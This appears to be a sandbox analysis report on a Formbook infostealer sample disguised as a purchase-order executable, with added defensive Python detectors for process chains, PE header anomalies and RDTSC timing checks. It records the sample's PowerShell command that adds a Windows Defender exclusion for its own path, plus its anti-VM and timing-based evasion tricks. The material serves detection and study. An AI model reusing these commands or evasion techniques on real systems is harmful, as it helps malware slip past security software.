Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Purchase_order_397484658464974945648447564845.exe
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_015096C8 NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150B60D NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150B6D0 NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041831B NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_00BDA434
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150D290
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00401030
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041C1B8
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041A2F3
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00408C5C
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00408C60
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041BC7D
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B5E2
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00402D90
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041C7F0
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041BF92
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00402FB0
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilename vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000000.211406162.0000000000B52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRFkL BUJ.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilename vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRFkL BUJ.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.269183019.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000000.264656959.0000000000CE2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/9@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210223
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6392
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zj10wm5e.0o0.ps1
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Source: Purchase_order_397484658464974945648447564845.exe | Virustotal: Detection: 40%
Source: Purchase_order_397484658464974945648447564845.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | File read: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
Source: unknown | Process created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown | Process created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Process created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
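The process chain recorded above is the part of this report most directly useful for detection: the sample launches powershell.exe to add a Windows Defender exclusion for its own path, runs cmd.exe /c timeout 1, and then starts a second copy of itself (the usual prelude to injecting into the child). The following is an added example, not part of the Joe Sandbox report, of detection logic run over process-creation records constructed from the entries listed above plus one benign control. The ProcEvent field names, the detect() rule set and the severity labels are assumptions for illustration; Sysmon Event ID 1 or EDR telemetry carries the same parent image, image and command line.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names are an assumption; Sysmon Event ID 1
    or EDR telemetry carries the same parent image / image / command line)."""
    parent: str
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe"

# Constructed from the process-creation entries in the report above, plus one benign control.
EVENTS = [
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference "
              r"-ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force"),
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\cmd.exe", r"'C:\Windows\System32\cmd.exe' /c timeout 1"),
    ProcEvent(SAMPLE, SAMPLE, SAMPLE),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\timeout.exe", "timeout 1"),
    # Benign control: an administrator excluding a build directory from an interactive shell.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Add-MpPreference -ExclusionPath 'D:\Builds'"),
]

# Paths a standard user can write to; binaries running from here deserve less trust.
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
EXCLUSION = re.compile(r"\bAdd-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (severity, rule, subject) findings. Hypothetical rule set, not the sandbox's."""
    findings = []
    for ev in events:
        parent_in_user_dir = bool(USER_WRITABLE.match(ev.parent))
        # Rule 1: PowerShell adding a Defender exclusion.
        if basename(ev.image) == "powershell.exe" and EXCLUSION.search(ev.cmdline):
            if ev.parent.lower() in ev.cmdline.lower():
                severity = "critical"       # the parent is excluding its own path
            elif parent_in_user_dir:
                severity = "high"
            else:
                severity = "medium"         # interactive admin use: still worth a look
            findings.append((severity, "defender_exclusion", ev.parent))
        # Rule 2: a binary in a user-writable directory re-launching itself, the usual
        # prelude to hollowing or injecting into the suspended child.
        if ev.parent.lower() == ev.image.lower() and USER_WRITABLE.match(ev.image):
            findings.append(("high", "self_spawn_user_dir", ev.image))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding)
```

Rule 1 scores highest when the parent's own path appears inside the exclusion argument, which is exactly what the report shows; an exclusion added from explorer.exe with an unrelated path only gets a medium so that legitimate administration does not drown the signal.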
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: System.Core.ni.pdbRSDSD source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: jVisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Configuration.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: mscorlib.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: System.Drawing.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: .pdbHh source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdb source: WERFC3.tmp.dmp.15.dr

Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: real checksum: 0xa25a1 should be: 0xabc83
The COFF TimeDateStamp is the linker's build time; a value decades in the future cannot be genuine and marks a forged or randomised header. The two checksum values differ, which is what a packer or any post-link patch leaves behind, since the linker's stored CheckSum no longer covers the bytes on disk.
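Both findings above come straight from the PE headers and can be reproduced without a sandbox. The example below is added here and is not part of the report: it reads TimeDateStamp and CheckSum with the standard library, reimplements the PE checksum algorithm (a ones' complement sum of 16-bit words with end-around carry, skipping the CheckSum field, plus the file length) and flags both anomalies. The helpers triage_pe, build_test_pe and REPORT_DATE and the max_future_days threshold are assumptions for illustration; the test buffer is a constructed minimal header carrying the report's timestamp, not the sample itself.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Optional

# Date of the analysis run, taken from the 20210223 artefact the report lists (assumed UTC).
REPORT_DATE = datetime(2021, 2, 23, tzinfo=timezone.utc)


def pe_checksum(data: bytes, checksum_offset: Optional[int] = None) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum the way imagehlp's CheckSumMappedFile does:
    ones' complement sum of the 16-bit little-endian words (carry folded back in), with the
    4-byte CheckSum field itself skipped, plus the file length."""
    padded = data if len(data) % 2 == 0 else data + b"\x00"
    total = 0
    for off in range(0, len(padded), 2):
        if checksum_offset is not None and checksum_offset <= off < checksum_offset + 4:
            continue
        total += int.from_bytes(padded[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)      # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def parse_pe(data: bytes) -> dict:
    """Pull TimeDateStamp and CheckSum out of the headers; no third-party parser needed."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    timestamp = struct.unpack_from("<I", data, coff + 4)[0]    # IMAGE_FILE_HEADER.TimeDateStamp
    opt = coff + 20                                             # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                             # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_offset = opt + 64                                  # CheckSum sits at +64 in both layouts
    checksum = struct.unpack_from("<I", data, checksum_offset)[0]
    return {"timestamp": timestamp, "checksum": checksum, "checksum_offset": checksum_offset}


def triage_pe(data: bytes, now: Optional[datetime] = None, max_future_days: int = 1) -> dict:
    """Flag the two header anomalies the sandbox reported (hypothetical helper)."""
    hdr = parse_pe(data)
    now = now or datetime.now(timezone.utc)
    built = datetime.fromtimestamp(hdr["timestamp"], tz=timezone.utc)
    computed = pe_checksum(data, hdr["checksum_offset"])
    return {
        "timestamp_utc": built.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "timestamp_in_future": built > now + timedelta(days=max_future_days),
        "header_checksum": hdr["checksum"],
        "computed_checksum": computed,
        # A zero CheckSum is normal for unsigned builds (the linker need not fill it in).
        # A non-zero value that does not match means the file changed after linking
        # (packed, patched, appended to) or the field was forged.
        "checksum_mismatch": hdr["checksum"] != 0 and hdr["checksum"] != computed,
    }


def build_test_pe(timestamp: int, checksum: int) -> bytes:
    """Constructed minimal PE32 header (DOS header, PE signature, COFF header, optional
    header) for exercising the code above. It is not loadable and is not the sample."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 96, 0x102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # The report's timestamp; the stored CheckSum is chosen to disagree with the recomputed one.
    sample = build_test_pe(0xF27DBEB9, 0xA25A1)
    for key, value in triage_pe(sample, now=REPORT_DATE).items():
        print(key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

Run against a real file, pass the file bytes to triage_pe; the parser only touches the DOS and COFF headers and the first 68 bytes of the optional header, so it also works on truncated or malformed samples that a full PE library would reject.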
The push/ret and push/iretd sequences below transfer control through the stack rather than through a call or jump, so a linear disassembler does not follow them; they are a common marker of obfuscated or packed code.
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041C942 push es; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041B3B5 push eax; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_00415C5F push esi; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041B46C push eax; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041B402 push eax; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041B40B push eax; ret
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041CD7C push ds; iretd
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_0041850E push esp; iretd
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_00415F8E push es; retf

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (58).png
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Process information set: NOOPENFILEERRORBOX (42 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (112 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (20 identical entries)
These SetErrorMode entries only suppress Windows error dialogs; the .NET runtime, PowerShell and WerFault set them routinely, so on their own they are a weak indicator.

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | RDTSC instruction interceptor: first address: 00000000004085E4, second address: 00000000004085EA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | RDTSC instruction interceptor: first address: 000000000040897E, second address: 0000000000408984, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 12_2_004088B0 rdtsc
Both RDTSC pairs sit in the unpacked payload (process 12): the xor/add between the two reads copies the low 32 bits of the first counter value into ecx so that the second read can be compared against it, and an unexpectedly large delta betrays single-stepping, hooked APIs or a slow virtualised timer. The device path queried alongside carries the VMware vendor string (NECVMWar), a plain VM-artefact check.
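The sequence the sandbox shows encodes as 0F 31 31 C9 01 C1 0F 31, which is cheap to hunt for statically in an unpacked dump. As an added example (not part of the report), the scanner below finds pairs of rdtsc opcodes within a small window and reports them at their mapped addresses; the constructed page of NOPs places the report's sequence at the offsets that reproduce the two findings above, plus a lone rdtsc that must not be paired. The helpers find_rdtsc_pairs and describe, the 16-byte window and the base address are assumptions for illustration. Because 0F 31 can also occur inside an immediate or a displacement of another instruction, treat hits as candidates to confirm in a disassembler.

```python
RDTSC = b"\x0f\x31"     # opcode of rdtsc


def find_rdtsc_pairs(code, base=0, max_gap=16):
    """Return (first_va, second_va, bytes_between) for every pair of rdtsc opcodes whose
    start addresses lie within max_gap bytes; that is the shape of a delta-timing check.
    Hypothetical helper. Raw byte matching can hit 0F 31 inside an immediate or a
    displacement, so confirm each hit in a disassembler."""
    hits = []
    pos = code.find(RDTSC)
    while pos != -1:
        nxt = code.find(RDTSC, pos + 2, pos + max_gap + 2)
        if nxt != -1:
            hits.append((base + pos, base + nxt, bytes(code[pos + 2:nxt])))
            pos = code.find(RDTSC, nxt + 2)        # a read belongs to one pair only
        else:
            pos = code.find(RDTSC, pos + 2)
    return hits


def describe(hit):
    """Render a hit in the same shape as the report's 'RDTSC instruction interceptor' line."""
    first, second, between = hit
    return "first address: %08X second address: %08X gap: %d bytes between: %s" % (
        first, second, second - first, between.hex(" "))


# Constructed page of NOPs standing in for the unpacked image at 0x408000 (not the sample's
# bytes): the report's sequence  rdtsc; xor ecx, ecx; add ecx, eax; rdtsc  is placed so that
# the addresses reproduce the two findings above, plus one lone rdtsc that must not pair.
BASE = 0x408000
SEQ = bytes.fromhex("0f31 31c9 01c1 0f31")
_page = bytearray(b"\x90" * 0x1000)
_page[0x5E4:0x5E4 + len(SEQ)] = SEQ
_page[0x97E:0x97E + len(SEQ)] = SEQ
_page[0x200:0x202] = RDTSC
CODE = bytes(_page)


if __name__ == "__main__":
    for hit in find_rdtsc_pairs(CODE, BASE):
        print(describe(hit))
```

On a real dump, feed the bytes of the executable section and its image base; a hit whose gap is a handful of bytes and whose intervening code only moves eax around is the timing check, while a hit hundreds of bytes apart is usually two unrelated reads.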
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4442
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2845
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876 | Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
